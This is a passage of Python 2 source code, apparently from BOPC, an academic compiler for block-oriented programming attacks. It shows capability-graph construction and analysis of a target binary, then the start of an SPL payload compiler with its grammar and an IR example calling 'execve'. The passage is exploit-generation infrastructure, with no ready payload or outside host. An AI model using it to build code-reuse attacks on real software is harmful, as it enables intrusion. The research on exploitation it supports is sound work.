        # ---------------------------------------------------------------------       
        emph("Binary has %s interesting statements:" % bold(self.__cap.order()))

        stmt_ctr = { 'regset' : 0, 'regmod' : 0, 'memrd' : 0, 'memwr' : 0, 'call' : 0, 'cond' : 0 }
        
        for _, data in self.__cap.nodes(data=True):
             stmt_ctr[ data['type'] ] += 1          # count statements


        emph("\t%s register assignments"   % bold(stmt_ctr['regset'], pad=5))
        emph("\t%s register modifications" % bold(stmt_ctr['regmod'], pad=5))
        emph("\t%s memory reads     "      % bold(stmt_ctr['memrd'], pad=5))
        emph("\t%s memory writes    "      % bold(stmt_ctr['memwr'], pad=5))
        emph("\t%s system/library calls"   % bold(stmt_ctr['call'], pad=5))
        emph("\t%s conditional jumps"      % bold(stmt_ctr['cond'], pad=5))


        # ---------------------------------------------------------------------
        # Add edges to the Capability Graph
        # ---------------------------------------------------------------------

        # don't calculate edges if asked (it's time consuming)
        if options & CAP_NO_EDGE:
            dbg_prnt(DBG_LVL_1, "Skipping edge calculation of capability graph.")
            return


        dbg_prnt(DBG_LVL_1, "Building the Capability Graph...")


        # list of node addresses
        node_list = [ d['addr'] for _, d in self.__cap.nodes_iter(data=True) ]    
        SPT       = nx.DiGraph()                    # create the Shortest Path Tree
        completed = 0                               # % completed

        csp = P._cfg_shortest_path(self.__cfg)      # create the CFG Shortest Path object


        warn("This can be a very slow process ('-dd' and '-ddd' options show a progress bar)")

        # for each node u_ in Capability Graph
        for u_, du in self.__cap.nodes_iter(data=True):            
            v_ = -1                                 # v_ is the uid of the target node (u_ -> v_)            

            SPT.clear()                             # clear Shortest Path Tree

            # Find the shortest paths (in CFG) to every other statement. Unfortunately, shortest
            # paths in CFG are not like regular shortest paths, as we explain in path.py. Thus we
            # have to re-calculate all shortest paths for every node in the capability graph.
            for length, path in csp.shortest_path(du['addr'], node_list):
                v_ += 1                             # the uid of the current node (it's linear)

                if length == INFINITY:
                    continue                        # skip nodes with non-existing paths

                # ---------------------------------------------------------------------------------
                # Now, if we directly add the edges with shortest path lengths to the capability
                # graph, we'll have an interesting problem: Consider the path A - x - x - B - x - C
                # in CFG. The Capability Graph should contain the edges (A, B, 3) and (B, C, 2). 
                # However the naive approach, will also add the edge (A, C, 5) to the graph. The
                # problem here is that we cannot accurately measure chains of statements due to the
                # direct edges.
                #
                # To fix this issue we build the Shortest Path Tree (SPT). That is, we merge all
                # shortest paths, into a single graph. The resulting graph will be tree as it
                # consists only of single source shortest paths (without loops), with all edges
                # having weight = 1. SPT has two types of nodes: Black and White. Black nodes 
                # contain statements (should appear on capability graph) while White nodes are used
                # for transitions. The first and the last nodes of each shortest path are Black
                # while every other node between is White. Our goal is to remove all White nodes
                # and merge the resulting SPT with the capability graph.
                #
                # We remove the White nodes one by one. When we remove a White node, we also update
                # the weights in SPT.
                # ---------------------------------------------------------------------------------
               
                # add first and last nodes (Black) to the SPT (if already exists, make them Black)
                SPT.add_nodes_from([path[0], path[-1]], color='Black')

                # keep track of the statement uids that use this node (map address to UID)
                SPT.node[path[0] ].setdefault('uid', set()).add(u_)
                SPT.node[path[-1]].setdefault('uid', set()).add(v_)

                # convert nodes [1,2,3,4], into edges [(1,2),(2,3),(3,4)] and add them to SPT
                SPT.add_edges_from(zip(path, path[1:]), weight=1)

                # color the intermediate nodes White (if they're not Black)
                for p in path[1:-1]:
                    if 'color' not in SPT.node[p] or SPT.node[p]['color'] != 'Black':
                         SPT.node[p]['color'] = 'White'


            # iteratively delete the White nodes
            for n in [node for node, data in SPT.nodes(data=True) if data['color'] == 'White']:

                # for each pair of (incoming, outgoing) edges
                for src, _, d1 in SPT.in_edges(n, data=True):
                    for _, dst, d2 in SPT.out_edges(n, data=True):
                        # add a new edge that bypasses the White node
                        SPT.add_edge(src, dst, weight=d1['weight']+d2['weight'])


                SPT.remove_node(n)                  # delete White node (along with its edges)


            ''' at this point, SPT will only contain Black nodes '''

            # merge SPT to the capability graph
            for e1, e2, data in SPT.edges_iter(data=True):
                # copy it edge-by-edge
                for u in SPT.node[e1]['uid']:       # move from addresses back to UIDs
                    for v in SPT.node[e2]['uid']:   
                        if u != v:                  # that's to avoid self-loops
                            self.__cap.add_edge(u, v, weight=data['weight'])
                            

            # show current progress (%)
            percent = math.floor(100. / len(self.__cap) * u_)
            if completed < percent:
                completed = percent            
                dbg_prnt(DBG_LVL_2, "%d%% completed" % completed)

        del SPT                                     # we don't need the SPT anymore

        dbg_prnt(DBG_LVL_1, "Done. Capability Graph generated successfully.")
      
        visualize(self.__cap)

     

        # ---------------------------------------------------------------------
        # Save Capability Graph to a file ?
        # ---------------------------------------------------------------------       
        if options & CAP_SAVE:
            dbg_prnt(DBG_LVL_1, "Saving Capability Graph...")

            try:
                nx.write_gpickle(self.__cap, self.__name + '.cap')
                dbg_prnt(DBG_LVL_1, "Done. Capability Graph saved as %s" % self.__name + '.cap')

            except IOError, err:
                error("Cannot save Capability Graph: %s" % str(err))



    # ---------------------------------------------------------------------------------------------
    # get(): Return the Capability Graph. Just in case ;)
    #
    # :Ret: The Capability Graph
    #
    def get( self ):
        return self.__cap



    # ---------------------------------------------------------------------------------------------
    # save(): Save the nodes of the Capability Graph (i.e., the interesting statements) to a file.
    #
    # :Ret: None.
    #
    def save( self ):
        now    = datetime.datetime.now()            # get current timestamp
        banner = textwrap.dedent("""\
            #
            # This file has been created by BOPC at %s
            # '%s' has %d interesting statements. Each line shows a statement.
            #
            # The columns are: address | type | register | value | mode | +W | operator | name
            # When an attribute is not available, a dot '.' is presented.
            #
            #
            # Attribute list:
            #
            #   address  : Address of the basic block tha contains the statement
            #   type     : Statement type: regset / regmod / call / cond
            #   register : Register name (for regset / regmod / cond)
            #   memory   : Memory address (for memrd / memwr)
            #   value    : Statement's value (for regset / regmod / cond)
            #   mode     : Statement mode (const / deref for regset and syscall / libcall for call)
            #   +W       : A flag indicating whether "val" points to a writable address (for regset)
            #   operator : Statement operator (for regmod / cond)
            #   name     : Function name (for call)
            #
        """ % (now.strftime("%d/%m/%Y %H:%M"), self.__name, self.__cap.order()))


        dbg_prnt(DBG_LVL_1, "Dumping interesting statments to a file...")    
         
        try:    
            cap = open(self.__name + '.stmt', 'w')

            cap.write(banner)                       # write banner first

            # write statements one by one
            for _, d in self.__cap.nodes_iter(data=True):                  
                opt  = '%10s'   % (d['reg']  if 'reg'  in d else '.')
                opt += '%10s'   % (d['mem']  if 'mem'  in d else '.')
                opt += ' %32s ' % (d['val']  if 'val'  in d else '.')
                opt += '%10s'   % (d['mode'] if 'mode' in d else '.')
                opt += '%10s'   % (d['+W']   if '+W'   in d else '.')
                opt += '%10s'   % (d['op']   if 'op'   in d else '.')
                opt += '%16s'   % (d['name'] if 'name' in d else '.')
                opt += '%10s'   % (d['size'] if 'size' in d else '.')

                cap.write( "0x%08x %10s %s\n" % (d['addr'], d['type'], opt) )
                       
            cap.close()
           
            dbg_prnt(DBG_LVL_1, "Done. Capability Graph saved as %s" % self.__name + '.stmt')

        except IOError, err:
            error("Cannot create statements file: %s" % str(err))



    # ---------------------------------------------------------------------------------------------
    # explore(): Explore the Capability Graph and look for "islands".
    #    
    # :Ret: None.
    #
    def explore( self ):        
        dbg_prnt(DBG_LVL_1, "Exploring the Capability Graph...")

        self.__islands = []                         # store islands here
        n_inslands     = 0                          # number of islands
        size, diam     = [], []                     # size and diameter lists
        

        # ---------------------------------------------------------------------
        # The first step is to extract the "islands" from the Capability Graph,
        # which are essentially the Strong Connected Components (SCC) of the
        # undirected version of the graph.
        # ---------------------------------------------------------------------
        capU      = self.__cap.to_undirected()      # make Capability Graph undirected
        unvisited = set(capU.nodes())               # initially, no node is visited

        while len(unvisited):                       # while there are unvisited nodes
            root = unvisited.pop()                  # pick a random node
            unvisited.add( root )                   # and remove it from set
            
            nodeset = []                            # nodes in the current island

            # explore the island using DFS and obtain the node set
            for u in nx.dfs_preorder_nodes(capU, root):            
                unvisited.remove(u)                 # mark u as visited
                nodeset.append(u)                   # and add it to node set

                self.__cap.node[ u ]['island'] = n_inslands
            

            # get island as induced (directed) subgraph and relabel nodes in [0, order(G)-1] range
            graph   = self.__cap.subgraph(nodeset)    
            relabel = dict(zip(graph.nodes(), range(graph.order())))
            graph   = nx.relabel_nodes(graph, relabel)
            

            # ---------------------------------------------------------------------
            # Calculate island's diameter. Although the island is fully connected
            # in the undirected version, it's not in the directed version. Thus,
            # nx.diameter(graph) throws an exception. The diameter of the island,
            # is the longest shortest path between any two nodes.
            # ---------------------------------------------------------------------
            D = 0                                   # island's diameter

            for n in graph.nodes_iter():
                # caclulate all shortest paths from the given node
                length = nx.single_source_shortest_path_length(graph, n)
                maxlen = max(length.values())       # get the longest shortest path

                if D < maxlen: D = maxlen           # keep track of the longest among all nodes


            size.append(len(nodeset))               # island size
            diam.append( D)                         # island's diameter

            self.__islands.append( {                # store island's information
                'root'     : root,
                'size'     : graph.order(),
                'diameter' : D,
                'graph'    : graph
            } )
   
            n_inslands += 1                         # total # islands

        dbg_prnt(DBG_LVL_1, "Done.")


        # ---------------------------------------------------------------------
        # Show some statistics
        # ---------------------------------------------------------------------      
        warn("'-dd' and '-ddd' options show the 'size' and 'diameter' lists")

        emph("Capability Graph has %s islands" % bold(n_inslands))

        emph("Island sizes: max = %s, min = %s, avg = %s" % 
            (bold(max(size)), bold(min(size)), bold(1.*sum(size)/n_inslands, 'float')))

        dbg_arb(DBG_LVL_2, "Island size list", size)

        emph("Island diameters: max = %s, min = %s, avg = %s" % 
            (bold(max(diam)), bold(min(diam)), bold(1.*sum(diam)/n_inslands, 'float')))

        dbg_arb(DBG_LVL_2, "Island diameter list", diam)



    # ---------------------------------------------------------------------------------------------
    # analyze(): Perform various analyses to the islands of the Capability Graph.
    #
    # :Arg analyses: The analyses to perform (can be many)
    # :Ret: None.
    #
    def analyze( self, *analyses ):
        dbg_prnt(DBG_LVL_1, "Analyzing the Capability Graph...")

        for analysis in analyses:                   # for every different analysis
            try:
                # based on the analysis, select the appropriate function and invoke it
                func = {
                    CAP_STMT_COMB_CTR : self.__analyze_stmt_comb_ctr,
                    CAP_STMT_MIN_DIST : self.__analyze_stmt_min_dist,
                    CAP_LOOPS         : self.__analyze_loops
                }[ analysis ]


                for island in self.__islands:       # perform the analysis to every island
                    func( island['graph'] )

            except KeyError, err:
                fatal('Unknow analysis %s' % str(err))



    # ---------------------------------------------------------------------------------------------
    # analyze_island(): Analyze a specific island.
    #
    # :Arg addr: An address of any node of the island
    # :Arg analyses: The analyses to perform (can be many)
    # :Ret: None.
    #
    def analyze_island( self, addr, *analyses ):
        # ---------------------------------------------------------------------
        # Search for the island to analyze
        # ---------------------------------------------------------------------
        island_id = -1

        for _, d in self.__cap.nodes_iter(data=True):
            if d['addr'] == addr:
                island_id = d['island']
                break

        if island_id < 0:
            fatal("Node '0x%x' does not contained in any island" % addr)

        dbg_prnt(DBG_LVL_1, "Analyzing the Island %d..." % island_id)


        # ---------------------------------------------------------------------
        # Perform the analyses
        # ---------------------------------------------------------------------
        for analysis in analyses:                   # for every different analysis
            try:
                # based on the analysis, select the appropriate function and invoke it
                func = {
                    CAP_STMT_COMB_CTR : self.__analyze_stmt_comb_ctr,
                    CAP_STMT_MIN_DIST : self.__analyze_stmt_min_dist,
                    CAP_LOOPS         : self.__analyze_loops
                }[ analysis ]

                func( self.__islands[ island_id ]['graph'] )

            except KeyError, err:
                fatal('Unknow analysis %s' % str(err))



    # ---------------------------------------------------------------------------------------------
    # callback(): Invoke a callback function for every island.
    #
    # :Arg cbfunc: The callback function to invoke
    # :Ret: None.
    #
    def callback( self, cbfunc ):
        for island in self.__islands:
            cbfunc( island['graph'] )

    
    # TODO: Move these to private function sections


    # ---------------------------------------------------------------------------------------------
    # __analyze_stmt_comb_ctr(): Count the total number of combinations that K SPL statements can
    #       be chained together (repetitions of statements are allowed) on a given island.
    #    
    # :Arg island: The island graph to work on
    # :Ret: None.
    #
    def __analyze_stmt_comb_ctr( self, island ):
        dbg_prnt(DBG_LVL_1, "Starting Analysis: Statement Combinations...")


        # TODO: Check this again. Too many combinations :\
        K = 20


        # ---------------------------------------------------------------------
        # Find the total number of paths between any 2 nodes that use exactly
        # K edges. We calculate that using Dynamic Programming. Let C^k_{ij} be
        # the total number of paths from i to j with exactly k edges. Then we
        # have:
        #
        #              C^0_{ii} = 1, forall i in V
        #   C^k_{ij} = C^1_{ij} = 1, iff (i,j) in E
        #              C^k_{ij} = SUM(C^{k-1}_[xj]),  for all x adjacent to i
        #
        # We build this table in a bottom-up fashion. Time/Space Complexity is 
        # O(|V|^2 * K). We can improve space complexity by storing only the
        # last 2 K's (K and K-1).
        # ---------------------------------------------------------------------
        C = numpy.zeros((K, island.order(), island.order()), dtype=numpy.int64)
        
        for i in range(island.order()):             # initialize for K = 0
            C[0][i][i] = 1
        
        for i,j, d in island.edges_iter(data=True): # initialize for K = 1
            C[1][i][j] = 1
        
        for k in range(2, K):                       # main loop
            for i in island.nodes():
                for j in island.nodes():
                    for x in island.neighbors(i):
                        C[k][i][j] += C[k-1][x][j]

        # ---------------------------------------------------------------------
        for k in range(K):
            dbg_arb(DBG_LVL_1, "Combinations with up to %d statements:", sum(sum(C[k][:][:])))



    # ---------------------------------------------------------------------------------------------
    # __analyze_stmt_min_dist(): Calculate the minimum distance with between any two statements
    #       that have exactly K edges between on a given island.
    #
    # :Arg island: The island graph to work on
    # :Ret: None.
    #
    def __analyze_stmt_min_dist( self, island ):
        '''
        B = { }

        # enumerate all simple paths from i to j 
        # WARNING: O(n!) complexity !!!
        for i in island.nodes_iter():
            for j in island.nodes_iter():
                if i == j: continue

                for x in nx.all_simple_paths(island, i, j):
 
                    A = [island[a][b]['weight'] for a,b in zip(x, x[1:])]

                    B.setdefault(len(x), []).append(sum(A))
        '''


        dbg_prnt(DBG_LVL_1, "Starting Analysis: Statement Minimum Distances...")


        K = 20

        # ---------------------------------------------------------------------
        # Find the minimum distance between any 2 nodes that use exactly K edges.
        # This is very similar with the algorithm in __analyze_stmt_comb_ctr(),
        # but with different Dynamic Programming equations:
        #
        #              M^0_{ii} = 0, forall i in V
        #   M^k_{ij} = M^1_{ij} = weight[i][j], iff (i,j) in E
        #              M^k_{ij} = MIN(M^k_[ij], weight[i][x] + M^{k-1}_{xj}), 
        #                                              for all x adjacent to i
        # ---------------------------------------------------------------------
        M = numpy.full((K, island.order(), island.order()), dtype=numpy.int32, fill_value=INFINITY)
        

        for i in range(island.order()):             # initialize for K = 0
            M[0][i][i] = 0
        
        for i,j, d in island.edges_iter(data=True): # initialize for K = 1
            M[1][i][j] = d['weight']
        
        for k in range(2, K):                       # main loop
            for i in island.nodes():
                for j in island.nodes():
                    for x in island.neighbors(i):                        

                        M[k][i][j] = min(M[k][i][j], island[i][x]['weight'] + M[k-1][x][j])

        # ---------------------------------------------------------------------
        for k in range(K):
            m = numpy.min(M[k][:][:])            
            if m == INFINITY: break

            dbg_prnt(DBG_LVL_1, "Min shortest path with up to %d statements: %d" % (k, m))


    # ---------------------------------------------------------------------------------------------
    # __analyze_loops(): Analyze the loops on an a given island.
    #    
    # :Arg island: The island graph to work on
    # :Ret: None.
    #
    def __analyze_loops( self, island ):
        warn('Loop analysis is not supported yet')
       

# -------------------------------------------------------------------------------------------------


================================================
FILE: source/compile.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# compile.py:
#
# This module compiles an program written in SPL into an equivalent Intermediate Representation
# (IR) suitable for processing by subsequent modules. Please do not confuse it with the VEX IR.
#
# SPL is actually a subset of C, so it has the same syntax. Comments are denoted with '//'. Multi
# line comments are not supported.The specs of the language (expressed in EBNF) are shown below:
#
#       <SPL>    := 'void' 'payload' '(' ')' '{' <stmts> '}'
#       <stmts>  := ( <stmt> | <label> )* <return>?
#       <stmt>   := <varset> | <regset> | <regmod> | <memrd> | <memwr> | <call> | <cond> | <jump>
#
#       <varset> := 'int' <var> '=' <rvalue> ';'
#                 | 'int' <var> '=' '{'  <rvalue> (',' <rvalue>)* ';'
#                 | 'string' <var> '=' <str> ';'
#       <regset> := <reg> '=' <rvalue> ';'
#       <regmod> := <reg> <asgop> <number> ';'
#       <memrd>  := <reg> '=' '*' <reg> ';'
#       <memwr>  := '*' <reg> '=' <reg> ';'
#       <call>   := <var> '(' (e | <reg> (',' <reg>)*) ')'
#       <label>  := <var> ':'
#       <cond>   := 'if' '(' <reg> <cmpop> <number> ')' 'goto' <var> ';'
#       <jump>   := 'goto' <var> ';'
#       <return> := 'return' <number> ';'
#
#       <reg>    := '__r' <regid>
#       <regid>  := [0-7]
#       <var>    := [a-zA-Z_][a-zA-Z_0-9]*
#       <number> := ('+' | '-') [0-9]+ | '0x' [0-9a-fA-F]+
#       <rvalue> := <number> | '&' <var>
#       <str>    := '"' [.]* '"'
#       <asgop>  := '+=' | '-=' | '*=' | '/=' | '&=' | '|=' | '~=' | '^=' | '>>=' | '<<='
#       <cmpop>  := '==' | '!=' | '>' | '>=' | '<' | '<='
#
#
# Here's how the IR looks like:
#
#   {'uid': 2, 'type': 'regset', 'reg': 0, 'valty': 'num', 'val': -10}
#   {'uid': 6, 'type': 'varset', 'name': 'test', 'val': ['a1']}
#   {'uid': 10,'type': 'varset', 'name': 'bar',
#                           'val': ['\xd2\x04\x00\x00\x00\x00\x00\x00', ('foo',), ('test',)]}
#   {'uid': 12, 'type': 'regset', 'reg': 6, 'valty': 'var', 'val': ('bar',)}
#   {'uid': 18, 'type': 'regmod', 'reg': 6, 'op': '+', 'val': 17712}
#   {'uid': 6,  'type': 'memrd', 'reg': 0, 'mem': 1}
#   {'uid': 8,  'type': 'memwr', 'mem': 0, 'val': 1}
#   {'uid': 20, 'type': 'label'}
#   {'uid': 24, 'type': 'call', 'name': 'execve', 'args': [0, 1, 6], 'dirty': ['rax', 'rcx', 'rdx']}
#   {'uid': 30, 'type': 'cond', 'reg': 0, 'op': '==' 'num': 11, 'target': '@__26'}
#   {'uid': 32, 'type': 'jump', 'target': '@__20'}
#   {'uid': 34, 'type': 'return', 'target': 0xdead}
#
# NOTE: The compiler is implemented using regular expressions, and not using flex/bison, as it's
#   too simple. So, be careful about the language syntax, as very small differences (that may not
#   affect other languages) can result in syntax errors.
#
#
# * * * ---===== TODO list =====--- * * *
#
#   [1]. Consider the control flow of the SPL program upon "Semantic check #4".
#
# -------------------------------------------------------------------------------------------------
from coreutils import *
from calls     import *

import struct
import shlex
import re



# ------------------------------------------------------------------------------------------------
# Constant Definitions
# ------------------------------------------------------------------------------------------------
N_VIRTUAL_REGISTERS = 8                             # number of virtual registers

STATE_IDLE          = 0                             # program is in idle state
STATE_START         = 1                             # state after we encounter !PROGRAM START
STATE_END           = 2                             # state after we encounter !PROGRAM END

# tokens come in tuples (symbol, lineno). To make code easier to read, don't use 0 and 1 to
# access them, but instead use T and L
T = 0
L = 1

# Instead of incrementing pc and uid by one, we can increment them by two (or by larger intervals).
# This has to do with optimization. If we want to "inject" a new statement, we can do that without
# modifying the pc/uid of the other statements.
_STEP_UP = 2                                        # 2 is ok for current optimizer


# WARNING: Don't try to use modulo operator ;)
asg_ops = ['+=', '-=', '*=', '/=', '&=', '|=', '^=', '~=', '>>=', '<<=']
cmp_ops = ['==', '!=', '>',  '>=', '<',  '<=']


# The regular expressions to match various tokens
_reg_    = r'^__r[0-7]$'
_var_    = r'^[a-zA-Z_][a-zA-Z_0-9]*$'
_number_ = r'^(((\+|\-)?[0-9]+)|(0x[0-9a-fA-F]+))$'
_rvalue_ = r'^(((\+|\-)?[0-9]+)|(0x[0-9a-fA-F]+)|(\&[a-zA-Z_][a-zA-Z_0-9]*))$'
_asgop_  = r'^\+=|\-=|\*=|\/=|\&=|\|=|\^=|\~=|\>\>=|\<\<=$'
_cmpop_  = r'^\=\=|\!\=|\>|\>\=|\<|\<\=$'




# -------------------------------------------------------------------------------------------------
# compile: This is the main class that compiles an SPL program into its equivalent IR form.
#
class compile( object ):
    ''' ======================================================================================= '''
    '''                                   INTERNAL VARIABLES                                    '''
    ''' ======================================================================================= '''
    __prog          = ''                            # program's file name
    __state         = STATE_IDLE                    # program's state
    __lineno        = 1                             # current line number for parsing
    __pc            = START_PC                      # program counter (initialized)
    __uid           = 0                             # IR unique identifier
    __label_dict    = { }                           # label lookup
    __vartab        = { }                           # variable table
    __ir            = [ ]                           # intermediate list


    ''' ======================================================================================= '''
    '''                                   AUXILIARY FUNCTIONS                                   '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __syn_err(): A syntax error is fatal. Print a verbose explanation and halt execution.
    #
    # :Arg err: Error to display
    # :Ret: None.
    #
    def __syn_err( self, err, lineno ):
        fatal("%s:%d : Syntax Error: %s" % (self.__prog, lineno, err))



    # ---------------------------------------------------------------------------------------------
    # __sem_err(): A semantic error is fatal as well. Print a verbose explanation and halt
    #       execution.
    #
    # :Arg err: Error to display
    # :Ret: None.
    #
    def __sem_err( self, err ):
        fatal("%s : Semantic Error: %s" % (self.__prog, err))



    # ---------------------------------------------------------------------------------------------
    # __sem_warn(): A semantic warning isn't fatal, but it's still important. Print a verbose
    #       explanation and continue execution.
    #
    # :Arg err: Error to display
    # :Ret: None.
    #
    def __sem_warn( self, msg ):
        warn("%s : Semantic Warning: %s" % (self.__prog, msg))



    # ---------------------------------------------------------------------------------------------
    # __multi_re(): Extend regular expression matching to lists. Instead of applying 1 regex in a
    #       single string, __multi_re() applies a list of regexes in a list of strings. A list of
    #       errors is also supplied in case that a regex fails.
    #
    # :Arg stmt: List of statements to match
    # :Arg regex: List of regular expressions for statements
    # :Arg err: List of errors in case of a mismatch
    # :Ret: None.
    #
    def __multi_re( self, stmt, regex, err ):
        stmt, lno = zip(*stmt)

        if len(stmt) != len(regex):                 # check if parameters match
            self.__syn_err( "Invalid number of parameters", lno[0] )

        for i in range(len(stmt)):                  # for each string in list
            try:
                if not re.match(regex[i], stmt[i]): # apply regex
                    self.__syn_err("%s '%s'" % (err[i], stmt[i]), lno[i])
            except IndexError: pass



    # ---------------------------------------------------------------------------------------------
    # __ir_add(): Add a "compiled" statement to IR.
    #
    # :Arg tup: A tuple containing the statement
    # :Ret: None.
    #
    def __ir_add( self, tup ):
        # extend statement and add it to IR (along with its pc)
        self.__ir.append( ['@__' + str(self.__pc), dict([('uid',self.__uid)] + tup.items())] )

        # __pc and __uid are equal for now, but they're going be different after optimization.
        self.__pc  = self.__pc  + _STEP_UP          # increase program counter
        self.__uid = self.__uid + _STEP_UP          # assign a unique id to each statement



    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                     SYNTAX ANALYSIS                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __check_prog_state(): A decorator function (== hook) that is called before every statement
    #       parsing and verifies that all statements are inside payload() declaration.
    #
    # :Arg func: Function to invoke from decorator
    # :Ret: Decorator function.
    #
    def __check_prog_state( func ):
        def stmt_intrl( self, stmt ):
            dbg_prnt(DBG_LVL_3, "Parsing statement: " + ' '.join(zip(*stmt)[0]))

            if self.__state != STATE_START:
                self.__syn_err("Statement outside of !PROGRAM directives")

            func(self, stmt)                        # invoke the appropriate statement function

        return stmt_intrl                           # return decorator



    # ---------------------------------------------------------------------------------------------
    # __stmt_program(): A payload declaration has been encountered.
    #
    # :Arg stmt: Statement to process
    # :Ret: None.
    #
    def __stmt_program( self, stmt ):
        if self.__state == STATE_IDLE:
            # we haven't declare payload() yet. Make sure that declaration is "void payload() {"
            if len(stmt) != 5:
                self.__syn_err("Invalid number of aaa operands", stmt[0][L])

            self.__multi_re(stmt,
                [r'^void$', r'^payload$', r'^\($', r'^\)$', r'^\{$'],
                ["Invalid function declaration"]*5
            )

            self.__state = STATE_START              # change state

            # A pseudo-statement to avoid corner cases (needed for building the delta graph)
            self.__ir_add( {'type':'entry'} )


        elif self.__state == STATE_START:
            # we're looking to close payload() declaration ("}")
            if len(stmt) != 1:
                self.__syn_err("Code outside of function!", stmt[1][L])

            self.__multi_re(stmt, [r'^}$'],["Unknown"] )

            self.__state = STATE_END                # change state


        else:
            self.__syn_err("Invalid program state")



    # ---------------------------------------------------------------------------------------------
    # __stmt_var(): A variable assignment has been encountered.
    #
    # :Arg stmt: Statement to process
    # :Ret: None.
    #
    @__check_prog_state
    def __stmt_var( self, stmt ):
        # stmt[0] has already been checked. Some checks are redundant here, but we do them to keep
        # functions autonomous.

        # ---------------------------------------------------------------------
        if re.search(r'^string$', stmt[0][T]):
            # start with the easy one
            self.__multi_re( stmt[1:],
                [_var_, r'^=$', r'^".*"$',],
                ["Invalid variable name", "Expected '=', but found", "Invalid assigned value"]
            )

            val = [stmt[3][T][1:-1].decode('string_escape')]

        # ---------------------------------------------------------------------
        elif re.search(r'^int$', stmt[0][T]):
            self.__multi_re( stmt[1:3],
                [_var_, r'^=$'],
                ["Invalid variable name", "Expected '=', but found"]
            )

            try:
                if re.search(_rvalue_, stmt[3][T]): # single R-value

                    if stmt[3][T][0] == '&':
                        val = [(stmt[3][T][1:],)]
                    else:
                        val = [struct.pack('<Q', int(stmt[3][T], 0))]

                else:                               # array of R-values
                    val = []

                    self.__multi_re( [stmt[3]] + [stmt[4]] + [stmt[-1]],
                        [r'^\{$', _rvalue_, r'^\}$'],
                        ["Expected '{', but found", "Invalid R-value", "Expected '}', but found"]
                    )

                    if stmt[4][T][0] == '&':
                        val.append( (stmt[4][T][1:],) )
                    else:
                        val.append(struct.pack('<Q', int(stmt[4][T], 0)))

                    # parse all R-values
                    for i in range(5, len(stmt)-1, 2):
                        self.__multi_re( [stmt[i]] + [stmt[i+1]],
                            [r'^,$', _rvalue_],
                            ["Expected ',', but found", "Invalid R-value" ]
                        )

                        if stmt[i+1][T][0] == '&':
                            val.append( (stmt[i+1][T][1:],) )
                        else:
                            val.append(struct.pack('<Q', int(stmt[i+1][T], 0)))

            except IndexError:
                self.__syn_err("Invalid number of arguments", stmt[0][L])

        # ---------------------------------------------------------------------
        else:
            self.__syn_err("Invalid type", stmt[0][L])


        # ---------------------------------------------------------------------
        # This is a semantic check, but it's better to do it here
        # ---------------------------------------------------------------------
        if stmt[1][T] in self.__vartab:             # check if variable has already been declared
            self.__sem_err("Redeclaration of '%s'" % stmt[1][T])

        self.__vartab[ stmt[1][T] ] = val           # if not, add variable to vartab

        # add statement to IR
        self.__ir_add( {'type':'varset', 'name':stmt[1][T], 'val':val} )



    # ---------------------------------------------------------------------------------------------
    # __stmt_reg(): A register assignment/modification or a memory read has been encountered.
    #
    # :Arg stmt: Statement to process
    # :Ret: None.
    #
    @__check_prog_state
    def __stmt_reg( self, stmt ):
        self.__multi_re( [stmt[0]], [_reg_], ["Invalid register name"])


        # ---------------------------------------------------------------------
        # Memory read
        # ---------------------------------------------------------------------
        if re.search(r'^=$', stmt[1][T]) and re.search(r'^\*$', stmt[2][T]) and len(stmt) == 4:
            self.__multi_re( [stmt[3]], [_reg_], ["Invalid R-value"])

            self.__ir_add({'type':'memrd', 'reg':int(stmt[0][T][3],0), 'mem':int(stmt[3][T][3],0)})


        # ---------------------------------------------------------------------
        # Register assignment
        # ---------------------------------------------------------------------
        elif re.search(r'^=$', stmt[1][T]) and len(stmt) == 3:
            self.__multi_re( [stmt[2]], [_rvalue_], ["Invalid R-value"])

            if stmt[2][T][0] == '&':
                self.__ir_add( {'type'  : 'regset',
                                'reg'   : int(stmt[0][T][3]),
                                'valty' : 'var',
                                'val'   : (stmt[2][T][1:],)} )

            else:
                self.__ir_add( {'type'  : 'regset',
                                'reg'   : int(stmt[0][T][3]),
                                'valty' : 'num',
                                'val'   : int(stmt[2][T], 0)} )


        # ---------------------------------------------------------------------
        # Register modification
        # ---------------------------------------------------------------------
        elif re.search(_asgop_, stmt[1][T]) and len(stmt) == 3:
            self.__multi_re( [stmt[2]], [_number_], ["Invalid number"])


            self.__ir_add( {'type': 'regmod',
                            'reg' : int(stmt[0][T][3]),
                            'op'  : stmt[1][T][:-1],
                            'val' : int(stmt[2][T], 0)} )

        # ---------------------------------------------------------------------
        # Unknown register operation
        # ---------------------------------------------------------------------
        else:
            self.__syn_err("Unknown operator '%s'" % stmt[1][T], stmt[1][L])



    # ---------------------------------------------------------------------------------------------
    # __stmt_memwr(): An memory write statement has been encountered.
    #
    # :Arg stmt: Statement to process
    # :Ret: None.
    #
    @__check_prog_state
    def __stmt_memwr( self, stmt ):
        self.__multi_re( stmt,
            [r'^\*$', _reg_, r'^=$', _reg_],
            ["Expected '*', but found", "Invalid register name", "Expected '=', but found",
             "Invalid register name"]
        )

        self.__ir_add( {'type':'memwr', 'mem':int(stmt[1][T][3],0), 'val':int(stmt[3][T][3],0)} )



    # ---------------------------------------------------------------------------------------------
    # __stmt_call(). A library/system call has been encountered.
    #
    # :Arg stmt: Statement to process
    # :Ret: None.
    #
    @__check_prog_state
    def __stmt_call( self, stmt ):
